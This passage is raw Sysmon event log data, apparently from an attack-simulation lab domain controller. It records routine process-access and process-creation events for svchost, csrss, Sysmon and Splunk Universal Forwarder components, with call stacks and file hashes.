+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002645Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:34.961{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002644Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:34.961{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002643Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:34.961{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002642Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:34.961{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002641Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:34.961{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002640Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:34.961{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002639Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:34.961{10ACEC4A-853E-5FCF-0500-000000009101}644660C:\Windows\system32\csrss.exe{10ACEC4A-855E-5FCF-7D00-000000009101}652C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002638Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:34.961{10ACEC4A-8551-5FCF-3300-000000009101}30803808C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{10ACEC4A-855E-5FCF-7D00-000000009101}652C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002637Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:34.766{10ACEC4A-855E-5FCF-7D00-000000009101}652C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe8.0.2Monitor windows event logssplunk ApplicationSplunk Inc.splunk-winevtlog.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=A735F697C6C533F20D023E4318824194,SHA256=295236CFB06A5F9C1F76EECC468F9A070BFCB5C4E094918059EC86BBB654E119,IMPHASH=85F4904CF3562658E303E53274ABD436{10ACEC4A-8551-5FCF-3300-000000009101}3080C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002636Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:34.226{10ACEC4A-855D-5FCF-7C00-000000009101}25683972C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{10ACEC4A-8551-5FCF-3300-000000009101}3080C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002635Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:34.070{10ACEC4A-8552-5FCF-4100-000000009101}28042768C:\Windows\system32\conhost.exe{10ACEC4A-855D-5FCF-7C00-000000009101}2568C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002634Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:34.070{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002633Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:34.070{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002632Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:34.070{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002631Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:34.070{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002630Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:34.070{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002629Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:34.070{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002628Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:34.070{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002627Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:34.070{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002626Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:34.070{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002625Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:34.070{10ACEC4A-853E-5FCF-0500-000000009101}644792C:\Windows\system32\csrss.exe{10ACEC4A-855D-5FCF-7C00-000000009101}2568C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002624Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:34.070{10ACEC4A-8551-5FCF-3300-000000009101}30803808C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{10ACEC4A-855D-5FCF-7C00-000000009101}2568C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002623Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:33.873{10ACEC4A-855D-5FCF-7C00-000000009101}2568C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{10ACEC4A-8551-5FCF-3300-000000009101}3080C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002674Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:35.851{10ACEC4A-8552-5FCF-4100-000000009101}28042768C:\Windows\system32\conhost.exe{10ACEC4A-855F-5FCF-7E00-000000009101}2916C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002673Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:35.851{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002672Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:35.851{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002671Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 